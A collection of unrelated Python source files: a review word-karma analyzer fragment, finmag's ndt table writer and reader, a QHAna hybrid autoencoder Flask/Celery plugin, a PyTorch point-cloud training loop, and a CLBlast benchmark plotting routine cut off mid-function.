logging.info('%s' % exception.__str__())
return self.spanish_analyser.get_results()
def __set_review_not_analysable(self, review):
review.is_spam = True
self.review_repository.persist(review)
def __mix_results(self, *results):
lang_words = {}
for result in results:
for word, data in result.items():
self.__store_in_result_list(word, data, lang_words)
return lang_words
@staticmethod
def __store_in_result_list(word, data, lang_words):
word = word.lower()
if word in lang_words:
word = lang_words[word]
word.add_karma(data.karma)
for review_id in data.appearances:
if review_id not in word.appearances:
word.add_appearance(review_id)
else:
word = EvaluatedWord(word, data.karma, data.appearances)
lang_words[word.word] = word
def __store_conclusions(self, analysis, final_report):
karma = 0
for word, item in final_report.items():
self.__create_point_instance(word, item, analysis)
# Show conclusions and CALCULATE KARMA
header = ['Word', 'Karma', 'Review Appearances']
data = []
for word, item in final_report.items():
current = list()
current.append(word)
current.append(final_report[word].karma)
current.append(final_report[word].count)
data.append(current)
karma = (karma + float(final_report[word].karma)) / 2
logging.debug(tabulate(data, header))
# Store karma
analysis.karma = karma
self.analysis_repository.persist(analysis)
def __create_point_instance(self, word, item, analysis):
point = KeyPoint(
identifier=word,
karma=item.karma,
analysis=analysis
)
self.point_repository.persist(point)
analysis.add_key_point(point)
self.analysis_repository.persist(analysis)
self.__connect_points_to_reviews(item, point)
def __connect_points_to_reviews(self, item, point):
for review in item.appearances:
review = self.__retrieve_review_of_id(review)
if review is None:
continue
point.add_review(review)
def __retrieve_review_of_id(self, review_id):
return self.review_repository.get_of_id(review_id)
|
import os
import logging
import types
import numpy as np
from glob import glob
from types import TupleType, StringType
from aeon import timer
logger = logging.getLogger(name='finmag')
class Tablewriter(object):
# It is recommended that the comment symbol should end with a
# space so that there is no danger that it gets mangled up with
# the 'time' field because some of the code below relies on them
# being separated by some whitespace.
comment_symbol = '# '
def __init__(self, filename, simulation, override=False, entity_order=None, entities=None):
logger.debug("Creating DataWriter for file '%s'" % (filename))
# formatting for columns (could in principle be customized
# through extra arguments here)
precision = 12
charwidth = 18
self.float_format = "%" + str(charwidth) + '.' + str(precision) + "g "
self.string_format = "%" + str(charwidth) + "s "
# save_head records whether the headings (name and units)
# have been saved already
self.save_head = False
# entities:
# Idea is to have a dictionary of keys where the keys
# are reference names for the entities and
# the value is another dictionary, which has keys 'unit', 'get' and 'header':
# 'get' is the a function that takes a simulation object as the argument
# and returns the data to be saved.
#
# No doubt this can be done neater, more general, etc.
# For example, it would be desirable if we could get ALL
# the fields from the simulation object, i.e. demag, exchange,
# anisotropy and also the corresponding energies.
#
# Ideally this would have the flexiblity to realise when we have
# two different anisotropies in the simulation, and provide both of
# these. It may be that we need create a 'fieldname' that the user
# can provide when creating interactions which summarises what the
# field is about, and which can be used as a useful column header
# here for the ndt file.
if entities is None:
self._entities = {}
self.add_entity('time', {'unit': '<s>',
'get': lambda sim: sim.t,
'header': 'time'})
self.add_entity('m', {'unit': '<>',
'get': lambda sim: sim.m_average,
'header': ('m_x', 'm_y', 'm_z')})
# add time integrator dummy tokens than return NAN as we haven't got
# the integrator yet (or may never create one).
self.add_entity('steps', {
'unit': '<1>',
#'get': lambda sim: sim.integrator.stats()['nsteps'],
'get': lambda sim: np.NAN,
'header': 'steps'})
self.add_entity('last_step_dt', {
'unit': '<1>',
#'get': lambda sim: sim.integrator.stats()['hlast'],
'get': lambda sim: np.NAN,
'header': 'last_step_dt'})
self.add_entity('dmdt', {
'unit': '<A/ms>',
#'get': lambda sim: sim.dmdt_max,
'get': lambda sim: np.array([np.NAN, np.NAN, np.NAN]),
'header': ('dmdt_x', 'dmdt_y', 'dmdt_z')})
else:
self._entities = entities
self.filename = filename
self.sim = simulation
# in what order to write data
if entity_order:
self.entity_order = entity_order
else:
self.entity_order = self.default_entity_order()
# if file exists, cowardly stop
if os.path.exists(filename) and not override:
msg = "File %s exists already; cowardly stopping" % filename
raise RuntimeError(msg)
def add_entity(self, name, dic):
"""
Add an entity to be saved to this ndt file at the next data saving instance. The
arguments are:
name : a reference name for this entity (used to order the entities in the ndt file)
dic : a dictionary containing data for the header lines and a function to retrieve the data.
Examples:
For the time entity, we have
name = 'time'
dic = {'unit': '<s>',
'get': lambda sim: sim.t,
'header': 'time'},
For the magnetisation entity, we have
name = 'm'
dic = {'unit': '<>',
'get': lambda sim: sim.m_average,
'header': ('m_x', 'm_y', 'm_z')}
"""
if self.save_head:
raise RuntimeError("Attempt to add entity '{}'->'{}' to ndt file {}" +
"after file has been created -- this is impossible".
format(name, dic, self.filename))
assert name not in self._entities.keys(), \
"Attempt to add a second '{}' to entities for {}".\
format(name, self.filename)
# check that right keywords are given
entity_descr = "entity '{}' -> '{}'".format(name, dic)
assert 'header' in dic, "Missing 'header' in " + entity_descr
assert 'unit' in dic, "Missing 'unit' in " + entity_descr
assert 'get' in dic, "Missing 'get' in " + entity_descr
self._entities[name] = dic
self.update_entity_order()
def modify_entity_get_method(self, name, new_get_method):
"""Allows changing the get method. Is used for integrators at the moment: we register
dummy get methods when the tablewriter file is created, and then updated those if and
when an integrator has been created."""
assert name in self._entities, "Couldn't find '{}' in {}".format(
name, self._entities.keys())
logger.debug("Updating get method for {} in TableWriter(name={})".format(
name, self.filename))
# logger.debug("Updating get method for {} in TableWriter(name={}) old method: {}, new method: {}".format(
# name, self.filename, self._entities[name]['get'], new_get_method))
self._entities[name]['get'] = new_get_method
def delete_entity_get_method(self, name):
"""We cannot delete entities once they are created (as this would change the number of columns in the
data file). Instead, we register a return function that returns numpy.NAN.
"""
assert name in self._entities, "Couldn't find '{}' in {}".format(
name, self._entities.keys())
logger.debug("'Deleting' get method for {} in TableWriter(name={})".format(
name, self.filename))
self._entities[name]['get'] = lambda sim: np.NAN
def delete_entity_get_methods(self):
"""Method to delete all get_methods.
Might need this (trying to find references to the simulation objects are hiding).
"""
logger.debug("'Deletinging all get methods in TableWriter(name={})".format(self.filename))
keys = self._entities.keys()
for key in keys:
self.delete_entity_get_method(key)
def default_entity_order(self):
keys = self._entities.keys()
# time needs to go first
if 'time' in keys:
keys.remove('time')
return ['time'] + sorted(keys)
elif 'step' in keys:
keys.remove('step')
return ['step'] + sorted(keys)
else:
return keys
def update_entity_order(self):
self.entity_order = self.default_entity_order()
def headers(self):
"""return line one and two of ndt data file as string"""
line1 = [self.comment_symbol]
line2 = [self.comment_symbol]
for entityname in self.entity_order:
colheaders = self._entities[entityname]['header']
# colheaders can be a 3-tuple ('mx','my','mz'), say
# or a string ('time'). Avoid iterating over string:
if isinstance(colheaders, str):
colheaders = [colheaders]
for colhead in colheaders:
line1.append(self.string_format % colhead)
line2.append(self.string_format %
self._entities[entityname]['unit'])
return "".join(line1) + "\n" + "".join(line2) + "\n"
@timer.method
def save(self):
"""Append data (spatial averages of fields) for current
configuration"""
if not self.save_head:
f = open(self.filename, 'w')
# Write header
f.write(self.headers())
f.close()
self.save_head = True
# open file
with open(self.filename, 'a') as f:
f.write(' ' * len(self.comment_symbol)) # account for comment
# symbol width
# The commented lines below are Hans' initial attempt to catch when the
# number of columns to be written changes
# but this seems to never happen. So it's not quite right.
# Also, if this was the right place to catch it, i.e. if watching
# self._entities is the critical object that shouldn't change after
# the header has been written, then we should convert this into a
# 'property' which raises an error if called for writing once the
# header lines have been written. HF, 9 June 2014.
# if len(self._entities) == self.ncolumn_headings_written:
# msg = "It seems number of columns to be written" + \
# "to {} has changed".format(self.filename)
# msg += "from {} to {}. This is not supported.".format(
# self.ncolumn_headings_written, len(self.entity_order))
# logger.error(msg)
# raise ValueError(msg)
for entityname in self.entity_order:
value = self._entities[entityname]['get'](self.sim)
if isinstance(value, np.ndarray):
for v in value:
f.write(self.float_format % v)
elif isinstance(value, float) or isinstance(value, int):
f.write(self.float_format % value)
elif isinstance(value, types.NoneType):
#f.write(self.string_format % value)
f.write(self.string_format % "nan")
else:
msg = "Can only deal with numpy arrays, float and int " + \
"so far, but type is %s" % type(value)
raise NotImplementedError(msg)
f.write('\n')
class Tablereader(object):
# open ndt file
def __init__(self, filename):
self.filename = filename
# if file exists, cowardly stop
if not os.path.exists(filename):
raise RuntimeError("Cannot see file '%s'" % self.filename)
# immediatey read file
self.reload()
def reload(self):
"""Read Table data file"""
try:
self.f = open(self.filename, 'r')
except IOError:
raise RuntimeError("Cannot see file '%s'" % self.filename)
line1 = self.f.readline()
line2 = self.f.readline()
headers = line1.split()
units = line2.split()
assert len(headers) == len(units)
# use numpy to read remaining data (genfromtxt will
# complain if there are rows with different sizes)
try:
self.data = np.genfromtxt(self.f)
except ValueError:
raise RuntimeError("Cannot load data from file '{}'." +
"Maybe the file was incompletely written?".
format(self.f))
self.f.close()
# Make sure we have a 2d array even if the file only contains a single
# line (or none)
if self.data.ndim == 1:
self.data = self.data[np.newaxis, :]
# Check if the number of data columns is equal to the number of headers
assert self.data.shape[1] == len(headers) - 1
datadic = {}
# now wrap up data conveniently
for i, entity in enumerate(headers[1:]):
datadic[entity] = self.data[:, i]
self.datadic = datadic
def entities(self):
"""Returns list of available entities"""
return self.datadic.keys()
def timesteps(self):
"""Returns list of available time steps"""
return self.datadic['time']
def __getitem__(self, entity):
"""
Given the entity name, return the data as a 1D numpy array.
If multiple entity names (separated by commas) are given
then a 2D numpy array is returned where the columns represent
the data for the entities.
"""
if isinstance(entity, StringType):
res = self.datadic[entity]
elif isinstance(entity, TupleType):
res = [self.datadic[e] for e in entity]
else:
raise TypeError("'entity' must be a string or a tuple. "
"Got: {} ({})".format(entity, type(entity)))
return res
class FieldSaver(object):
"""
Wrapper class which can incrementally save data to one file or
multiple files (depending on the file type). Internally, this
keeps a counter which is included in the file name if multiple
files need to be created.
Supported file types:
.npy -- Creates multiple, incrementally numbered .npy files.
"""
cnt_pattern = '_{:06d}'
def __init__(self, filename, overwrite=False, incremental=False):
if not filename.endswith('.npy'):
filename += '.npy'
# Create any non-existing directory components
dirname = os.path.dirname(filename)
if dirname != '' and not os.path.exists(dirname):
os.makedirs(dirname)
self.filename = filename
self.basename, self.ext = os.path.splitext(filename)
self.incremental = incremental
self.counter = 0
if incremental:
existing_files = glob(self.basename + '_*' + self.ext)
else:
existing_files = glob(self.filename)
if len(existing_files) > 0:
if overwrite == False:
raise IOError(
"Will not overwrite existing file(s). Use 'overwrite=True' "
"if this is what you want.".format(self.basename))
else:
logger.debug("Overwriting {} existing file(s) "
"'{}*.npy'.".format(len(existing_files), self.basename))
for f in existing_files:
os.remove(f)
def save(self, data):
"""
Save the given data (which should be a numpy array).
"""
if self.incremental:
cur_filename = self.basename + \
self.cnt_pattern.format(self.counter) + self.ext
else:
cur_filename = self.filename
logger.debug("Saving field data to file '{}'.".format(cur_filename))
np.save(cur_filename, data)
self.counter += 1
def demo2():
import finmag
sim = finmag.example.barmini(name='demo2-fileio')
sim.save_averages()
# and write some more data
sim.schedule("save_ndt", every=10e-12)
sim.run_until(0.1e-9)
# read the data
data = Tablereader('demo2_fileio.ndt')
for t, mx, my, mz in zip(data['time'], data['m_x'], data['m_y'], data['m_z']):
print("t={:10g}, m = {:12}, {:12}, {:12}".format(t, mx, my, mz))
def demo1():
# create example simulation
import finmag
import dolfin as df
xmin, ymin, zmin = 0, 0, 0 # one corner of cuboid
xmax, ymax, zmax = 6, 6, 11 # other corner of cuboid
nx, ny, nz = 3, 3, 6 # number of subdivisions (use ~2nm edgelength)
mesh = df.BoxMesh(df.Point(xmin, ymin, zmin), df.Point(xmax, ymax, zmax), nx, ny, nz)
# standard Py parameters
sim = finmag.sim_with(
mesh, Ms=0.86e6, alpha=0.5, unit_length=1e-9, A=13e-12, m_init=(1, 0, 1))
filename = 'data.txt'
ndt = Tablewriter(filename, sim, override=True)
times = np.linspace(0, 3.0e-11, 6 + 1)
for i, time in enumerate(times):
print("In iteration {}, computing up to time {}".format(i, time))
sim.run_until(time)
ndt.save()
# now open file for reading
f = Tablereader(filename)
print f.timesteps()
print f['m_x']
if __name__ == "__main__":
print("Demo 1")
demo1()
print("Demo 2")
demo2()
|
# Copyright 2021 QHAna plugin runner contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from http import HTTPStatus
from io import StringIO
from json import dumps, loads
from tempfile import SpooledTemporaryFile
from typing import Dict, Mapping, Optional
import marshmallow as ma
from celery.canvas import chain
from celery.result import AsyncResult
from celery.utils.log import get_task_logger
from flask import Response
from flask.app import Flask
from flask.globals import request
from flask.helpers import url_for
from flask.templating import render_template
from flask.views import MethodView
from marshmallow import EXCLUDE
from sqlalchemy.sql.expression import select
from qhana_plugin_runner.api.util import (
FileUrl,
FrontendFormBaseSchema,
MaBaseSchema,
SecurityBlueprint,
)
from qhana_plugin_runner.celery import CELERY
from qhana_plugin_runner.db.db import DB
from qhana_plugin_runner.db.models.tasks import ProcessingTask
from qhana_plugin_runner.requests import open_url
from qhana_plugin_runner.storage import STORE
from qhana_plugin_runner.tasks import save_task_error, save_task_result
from qhana_plugin_runner.util.plugins import QHAnaPluginBase, plugin_identifier
_plugin_name = "hybrid-autoencoder"
__version__ = "v0.1.0"
_identifier = plugin_identifier(_plugin_name, __version__)
HA_BLP = SecurityBlueprint(
_identifier,
__name__,
description="Hybrid Autoencoder plugin API.",
template_folder="hybrid_ae_templates",
)
class HybridAutoencoderResponseSchema(MaBaseSchema):
name = ma.fields.String(required=True, allow_none=False, dump_only=True)
version = ma.fields.String(required=True, allow_none=False, dump_only=True)
identifier = ma.fields.String(required=True, allow_none=False, dump_only=True)
class HybridAutoencoderTaskResponseSchema(MaBaseSchema):
name = ma.fields.String(required=True, allow_none=False, dump_only=True)
task_id = ma.fields.String(required=True, allow_none=False, dump_only=True)
task_result_url = ma.fields.Url(required=True, allow_none=False, dump_only=True)
class HybridAutoencoderPennylaneRequestSchema(FrontendFormBaseSchema):
input_data = FileUrl(
required=True, allow_none=False, load_only=True, metadata={"label": "Input Data"}
)
number_of_qubits = ma.fields.Integer(
required=True,
allow_none=False,
load_only=True,
metadata={"label": "Number of Qubits"},
)
embedding_size = ma.fields.Integer(
required=True,
allow_none=False,
load_only=True,
metadata={"label": "Embedding Size"},
)
qnn_name = ma.fields.String(
required=True, allow_none=False, load_only=True, metadata={"label": "QNN Name"}
)
training_steps = ma.fields.Integer(
required=True,
allow_none=False,
load_only=True,
metadata={"label": "Training Steps"},
)
@HA_BLP.route("/")
class PluginsView(MethodView):
"""Plugins collection resource."""
@HA_BLP.response(HTTPStatus.OK, HybridAutoencoderResponseSchema())
@HA_BLP.require_jwt("jwt", optional=True)
def get(self):
"""Demo endpoint returning the plugin metadata."""
return {
"name": HybridAutoencoderPlugin.instance.name,
"version": HybridAutoencoderPlugin.instance.version,
"identifier": HybridAutoencoderPlugin.instance.identifier,
}
@HA_BLP.route("/ui/")
class MicroFrontend(MethodView):
"""Micro frontend for the hybrid autoencoder plugin."""
example_inputs = {
"inputData": "data:text/plain,0,0,0,0,0,0,0,0,0,0",
"numberOfQubits": 3,
"embeddingSize": 2,
"qnnName": "QNN3",
"trainingSteps": 100,
}
@HA_BLP.html_response(
HTTPStatus.OK, description="Micro frontend of the hybrid autoencoder plugin."
)
@HA_BLP.arguments(
HybridAutoencoderPennylaneRequestSchema(
partial=True, unknown=EXCLUDE, validate_errors_as_result=True
),
location="query",
required=False,
)
@HA_BLP.require_jwt("jwt", optional=True)
def get(self, errors):
"""Return the micro frontend."""
return self.render(request.args, errors)
@HA_BLP.html_response(
HTTPStatus.OK, description="Micro frontend of the hybrid autoencoder plugin."
)
@HA_BLP.arguments(
HybridAutoencoderPennylaneRequestSchema(
partial=True, unknown=EXCLUDE, validate_errors_as_result=True
),
location="form",
required=False,
)
@HA_BLP.require_jwt("jwt", optional=True)
def post(self, errors):
"""Return the micro frontend with prerendered inputs."""
return self.render(request.form, errors)
def render(self, data: Mapping, errors: dict):
print(">>>", errors)
schema = HybridAutoencoderPennylaneRequestSchema()
return Response(
render_template(
"hybrid_ae_template.html",
name=HybridAutoencoderPlugin.instance.name,
version=HybridAutoencoderPlugin.instance.version,
schema=schema,
values=data,
errors=errors,
process=url_for(f"{HA_BLP.name}.HybridAutoencoderPennylaneAPI"),
example_values=url_for(
f"{HA_BLP.name}.MicroFrontend", **self.example_inputs
),
)
)
@HA_BLP.route("/process/pennylane/")
class HybridAutoencoderPennylaneAPI(MethodView):
"""Start a long running processing task."""
@HA_BLP.response(HTTPStatus.OK, HybridAutoencoderTaskResponseSchema)
@HA_BLP.arguments(
HybridAutoencoderPennylaneRequestSchema(unknown=EXCLUDE), location="form"
)
@HA_BLP.require_jwt("jwt", optional=True)
def post(self, req_dict):
"""Start the demo task."""
db_task = ProcessingTask(
task_name=hybrid_autoencoder_pennylane_task.name,
parameters=dumps(req_dict),
)
db_task.save(commit=True)
# all tasks need to know about db id to load the db entry
task: chain = hybrid_autoencoder_pennylane_task.s(
db_id=db_task.id
) | save_task_result.s(db_id=db_task.id)
# save errors to db
task.link_error(save_task_error.s(db_id=db_task.id))
result: AsyncResult = task.apply_async()
db_task.task_id = result.id
db_task.save(commit=True)
return {
"name": hybrid_autoencoder_pennylane_task.name,
"task_id": str(result.id),
"task_result_url": url_for("tasks-api.TaskView", task_id=str(result.id)),
}
class HybridAutoencoderPlugin(QHAnaPluginBase):
name = _plugin_name
version = __version__
def __init__(self, app: Optional[Flask]) -> None:
super().__init__(app)
def get_api_blueprint(self):
return HA_BLP
def get_requirements(self) -> str:
# return "git+ssh://git@github.com/UST-QuAntiL/MuseEmbeddings.git@6cc2f18fdd6b9483d5aaa68d12f8e01cb6329dde#egg=hybrid_autoencoders"
return ""
TASK_LOGGER = get_task_logger(__name__)
@CELERY.task(
name=f"{HybridAutoencoderPlugin.instance.identifier}.pennylane_hybrid_autoencoder_task",
bind=True,
)
def hybrid_autoencoder_pennylane_task(self, db_id: int) -> str:
import numpy as np
from hybrid_autoencoders import simple_api
TASK_LOGGER.info(
f"Starting new hybrid autoencoder pennylane task with db id '{db_id}'"
)
task_data: ProcessingTask = DB.session.execute(
select(ProcessingTask).filter_by(id=db_id)
).scalar_one()
if task_data is None:
msg = f"Could not load task data with id {db_id} to read parameters!"
TASK_LOGGER.error(msg)
raise KeyError(msg)
params: Dict = loads(task_data.parameters or "{}")
input_data_url: str = params.get("input_data", None)
q_num: int = params.get("number_of_qubits", None)
embedding_size: int = params.get("embedding_size", None)
qnn_name: str = params.get("qnn_name", None)
steps: int = params.get("training_steps", None)
TASK_LOGGER.info(
f"input_data: {input_data_url}, q_num: {q_num}, embedding_size: {embedding_size}, qnn_name: {qnn_name}, steps: {steps}"
)
if None in [input_data_url, q_num, embedding_size, qnn_name, steps]:
raise ValueError("Request is missing one or more values.")
with open_url(input_data_url, stream=True) as url_data:
input_data_arr = np.genfromtxt(url_data.iter_lines(), delimiter=",")
if input_data_arr.ndim == 1:
input_data_arr = input_data_arr.reshape((1, -1))
output_arr = simple_api.pennylane_hybrid_autoencoder(
input_data_arr, q_num, embedding_size, qnn_name, steps
)
with SpooledTemporaryFile(mode="w") as output:
np.savetxt(output, output_arr, delimiter=",")
STORE.persist_task_result(
db_id, output, "out.csv", "autoencoder-result", "text/csv"
)
output.seek(
0
) # TODO remove separate output if task output is already persisted as file
return "".join(output.readlines())
|
#!/usr/bin/env python
import startup
import pdb
import os
import time
import torch
from torch.utils.tensorboard import SummaryWriter
from models import model_pc_to as model_pc
from run.ShapeRecords import ShapeRecords
from util.app_config import config as app_config
from util.system import setup_environment
#from util.train import get_trainable_variables, get_learning_rate
#from util.losses import regularization_loss
from util.fs import mkdir_if_missing
#from util.data import tf_record_compression
#
# def parse_tf_records(cfg, serialized):
# num_views = cfg.num_views
# image_size = cfg.image_size
#
# # A dictionary from TF-Example keys to tf.FixedLenFeature instance.
# features = {
# 'image': tf.FixedLenFeature([num_views, image_size, image_size, 3], tf.float32),
# 'mask': tf.FixedLenFeature([num_views, image_size, image_size, 1], tf.float32),
# }
#
# if cfg.saved_camera:
# features.update(
# {'extrinsic': tf.FixedLenFeature([num_views, 4, 4], tf.float32),
# 'cam_pos': tf.FixedLenFeature([num_views, 3], tf.float32)})
# if cfg.saved_depth:
# features.update(
# {'depth': tf.FixedLenFeature([num_views, image_size, image_size, 1], tf.float32)})
#
# return tf.parse_single_example(serialized, features)
import numpy as np
def train():
cfg = app_config
setup_environment(cfg)
device = 'cuda' if torch.cuda.is_available() else 'cpu'
train_dir = cfg.checkpoint_dir
mkdir_if_missing(train_dir)
split_name = "train"
dataset_folder = cfg.inp_dir
dataset = ShapeRecords(dataset_folder, cfg,split_name)
dataset_loader = torch.utils.data.DataLoader(dataset,
batch_size=cfg.batch_size, shuffle=cfg.shuffle_dataset,
num_workers=4,drop_last=True)
summary_writer = SummaryWriter(log_dir=train_dir, flush_secs=10)
ckpt_count = 1000
summary_count=100
# loading pre existing model
# creating a new model
model = model_pc.ModelPointCloud(cfg)
model = model.to(device)
print(model.parameters)
log_dir = '../../dpc/run/model_run_data_lamp/'
mkdir_if_missing(log_dir)
learning_rate = 1e-4
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay = cfg.weight_decay)
# training steps
global_step = 38000
if global_step>0:
checkpoint_path = os.path.join(log_dir,'model.ckpt_{}.pth'.format(global_step))
print("Loading from path:",checkpoint_path)
checkpoint = torch.load(checkpoint_path)
global_step_val = checkpoint['global_step']
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
else:
global_step_val = global_step
model.train()
while global_step_val < cfg.max_number_of_steps:
step_loss = 0.0
for i, train_data in enumerate(dataset_loader, 0):
t9 = time.perf_counter()
for k in train_data.keys():
try:
train_data[k] = train_data[k].to(device)
except AttributeError:
pass
# get inputs by data processing
t0 = time.perf_counter()
inputs = model.preprocess(train_data, cfg.step_size)
t1 = time.perf_counter()
# zero the parameter gradients
optimizer.zero_grad()
t2 = time.perf_counter()
# dummy loss function
if global_step_val % summary_count == 0:
outputs = model(inputs, global_step_val, is_training=True, run_projection=True, summary_writer=summary_writer)
loss, min_loss = model.get_loss(inputs, outputs, summary_writer, add_summary=True,
global_step=global_step_val)
summary_writer.add_image('prediction',
outputs['projs'].detach().cpu().numpy()[min_loss[0]].transpose(2, 0, 1),
global_step_val)
summary_writer.add_image('actual', inputs['masks'].detach().cpu().numpy()[0].transpose(2, 0, 1),
global_step_val)
#print(chamfer_distance( outputs['projs'].detach().cpu().numpy()[min_loss[0]].transpose(2, 0, 1), inputs['masks'].detach().cpu().numpy()[0].transpose(2, 0, 1))
else:
outputs = model(inputs, global_step_val, is_training=True, run_projection=True)
loss,_ = model.get_loss(inputs, outputs, add_summary=False)
loss.backward()
optimizer.step()
del inputs
del outputs
t3 = time.perf_counter()
dt = t3 - t9
#print('Cuda {}'.format(t0-t9))
#print('Preprocess {}'.format(t1-t0))
#print('Forward {}'.format(t2-t1))
#print('Backward {}'.format(t3-t2))
step_loss += loss.item()
loss_avg = step_loss/(i+1)
print(f"step: {global_step_val}, loss= {loss.item():.5f}, loss_average = {loss_avg:.4f} ({dt:.3f} sec/step)")
if global_step_val % ckpt_count == 0: # save configuration
checkpoint_path = os.path.join(log_dir,'model.ckpt_{}.pth'.format(global_step_val))
print("PATH:",checkpoint_path)
torch.save({
'global_step': global_step_val,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss_avg
}, checkpoint_path)
global_step_val +=1
# pdb.set_trace()
# global_step = 0
# model = model_pc.ModelPointCloud(cfg, summary_writer, global_step)
# train_data = next(iter(dataset_loader))
# inputs = model.preprocess(train_data, cfg.step_size)
# outputs = model(inputs, global_step, is_training=True, run_projection=True)
# loss = outputs['poses'][:,1].norm(2)
# loss.backward()
# with summary_writer.as_default(), tfsum.record_summaries_every_n_global_steps(10):
# global_step = tf.train.get_or_create_global_step()
# model = model_pc.ModelPointCloud(cfg, global_step)
# inputs = model.preprocess(train_data, cfg.step_size)
#
# model_fn = model.get_model_fn(
# is_training=True, reuse=False, run_projection=True)
# outputs = model_fn(inputs)
#
# # train_scopes
# train_scopes = ['encoder', 'decoder']
#
# # loss
# task_loss = model.get_loss(inputs, outputs)
# reg_loss = regularization_loss(train_scopes, cfg)
# loss = task_loss + reg_loss
#
# # summary op
# summary_op = tfsum.all_summary_ops()
#
# # optimizer
# var_list = get_trainable_variables(train_scopes)
# optimizer = tf.train.AdamOptimizer(get_learning_rate(cfg, global_step))
# train_op = optimizer.minimize(loss, global_step, var_list)
#
# # saver
# max_to_keep = 2
# saver = tf.train.Saver(max_to_keep=max_to_keep)
#
# session_config = tf.ConfigProto(
# log_device_placement=False)
# session_config.gpu_options.allow_growth = cfg.gpu_allow_growth
# session_config.gpu_options.per_process_gpu_memory_fraction = cfg.per_process_gpu_memory_fraction
#
# sess = tf.Session(config=session_config)
# with sess, summary_writer.as_default():
# tf.global_variables_initializer().run()
# tf.local_variables_initializer().run()
# tfsum.initialize(graph=tf.get_default_graph())
#
# global_step_val = 0
# while global_step_val < cfg.max_number_of_steps:
# t0 = time.perf_counter()
# _, loss_val, global_step_val, summary = sess.run([train_op, loss, global_step, summary_op])
# t1 = time.perf_counter()
# dt = t1 - t0
# print(f"step: {global_step_val}, loss = {loss_val:.4f} ({dt:.3f} sec/step)")
# if global_step_val % 5000 == 0:
# saver.save(sess, f"{train_dir}/model", global_step=global_step_val)
def main(_):
train()
if __name__ == '__main__':
main()
|
# This file is part of the CLBlast project. The project is licensed under Apache Version 2.0. This file follows the
# PEP8 Python style guide and uses a max-width of 120 characters per line.
#
# Author(s):
# <NAME> <www.cedricnugteren.nl>
import utils
import matplotlib
matplotlib.use('Agg')
from matplotlib import rcParams
import matplotlib.pyplot as plt
# Colors
BLUEISH = [c / 255.0 for c in [71, 101, 177]] # #4765b1
REDISH = [c / 255.0 for c in [214, 117, 104]] # #d67568
PURPLISH = [c / 255.0 for c in [85, 0, 119]] # #550077
GREEN = [c / 255.0 for c in [144, 224, 98]] # #90e062
COLORS = [BLUEISH, REDISH, PURPLISH, GREEN]
MARKERS = ["o-", "x-", ".-"]
def plot_graphs(results, file_name, num_rows, num_cols,
x_keys, y_keys, titles, x_labels, y_labels,
label_names, title, tight_plot, verbose):
assert len(results) == num_rows * num_cols
assert len(results) != 1
assert len(x_keys) == len(results)
assert len(y_keys) == len(results)
assert len(titles) == len(results)
assert len(x_labels) == len(results)
assert len(y_labels) == len(results)
# Tight plot (for in a paper or presentation) or regular (for display on a screen)
if tight_plot:
plot_size = 5
w_space = 0.20
h_space = 0.39
title_from_top = 0.11
legend_from_top = 0.17
legend_from_top_per_item = 0.04
x_label_from_bottom = 0.09
legend_spacing = 0.0
font_size = 15
font_size_legend = 13
font_size_title = font_size
bounding_box = "tight"
else:
plot_size = 8
w_space = 0.15
h_space = 0.22
title_from_top = 0.09
legend_from_top = 0.10
legend_from_top_per_item = 0.07
x_label_from_bottom = 0.06
legend_spacing = 0.8
font_size = 15
font_size_legend = font_size
font_size_title = 18
bounding_box = None # means not 'tight'
# Initializes the plot
size_x = plot_size * num_cols
size_y = plot_size * num_rows
rcParams.update({'font.size': font_size})
fig, axes = plt.subplots(nrows=num_rows, ncols=num_cols, figsize=(size_x, size_y), facecolor='w', edgecolor='k')
fig.text(.5, 0.92, title, horizontalalignment="center", fontsize=font_size_title)
plt.subplots_adjust(wspace=w_space, hspace=h_space)
# Loops over each subplot
for row in range(num_rows):
for col in range(num_cols):
index = row * num_cols + col
result = results[index]
ax = axes.flat[index]
plt.sca(ax)
print("[plot] Plotting subplot %d" % index)
# Sets the x-axis labels
x_list = [[r[x_key] for r in result] for x_key in x_keys[index]]
x_ticks = [",".join([utils.float_to_kilo_mega(v) for v in values]) for values in zip(*x_list)]
x_location = range(len(x_ticks))
# Optional sparsifying of the labels on the x-axis
if tight_plot and len(x_location) > 10:
x_ticks = [v if not (i % 2) else "" for i, v in enumerate(x_ticks)]
# Sets the y-data
y_list = [[r[y_key] if y_key in r.keys() else 0 for r in result] for y_key in y_keys[index]]
y_max = [max(y) if len(y) else 1 for y in y_list]
y_max = max(y_max) if len(y_list) > 0 else 1
# Sets the axes
y_rounding = 10 if y_max < 80 else 50 if y_max < 400 else 200
y_axis_limit = (y_max * 1.2) - ((y_max * 1.2) % y_rounding) + y_rounding
plt.ylim(ymin=0, ymax=y_axis_limit)
plt.xticks(x_location, x_ticks, rotation='vertical')
# Sets the labels
ax.set_title(titles[index], y=1.0 - title_from_top, fontsize=font_size)
if col == 0 or y_labels[index] != y_labels[index - 1]:
ax.set_ylabel(y_labels[index])
ax.set_xlabel(x_labels[index])
ax.xaxis.set_label_coords(0.5, x_label_from_bottom)
# Plots the graph
assert len(COLORS) >= len(y_keys[index])
assert len(MARKERS) >= len(y_keys[index])
assert len(label_names) == len(y_keys[index])
for i in range(len(y_keys[index])):
color = COLORS[i]
marker = MARKERS[i]
if label_names[i] in ["CLBlast", "CLBlast FP32"]:
color = BLUEISH
marker = "o-"
elif label_names[i] in ["CLBlast FP16"]:
color = PURPLISH
marker = ".-"
elif label_names[i] in ["clBLAS", "clBLAS FP32", "clBLAS (non-batched)"]:
color = REDISH
marker = "x-"
elif label_names[i] in ["cuBLAS", "cuBLAS (non-batched)"]:
color = GREEN
marker = ".-"
ax.plot(x_location, y_list[i], marker, label=label_names[i], color=color)
# Sets the legend
leg = ax.legend(loc=(0.02, 1.0 - legend_from_top - legend_from_top_per_item * len(y_keys[index])),
handletextpad=0.1, labelspacing=legend_spacing, fontsize=font_size_legend)
leg.draw_frame(False)
# Saves the plot to disk
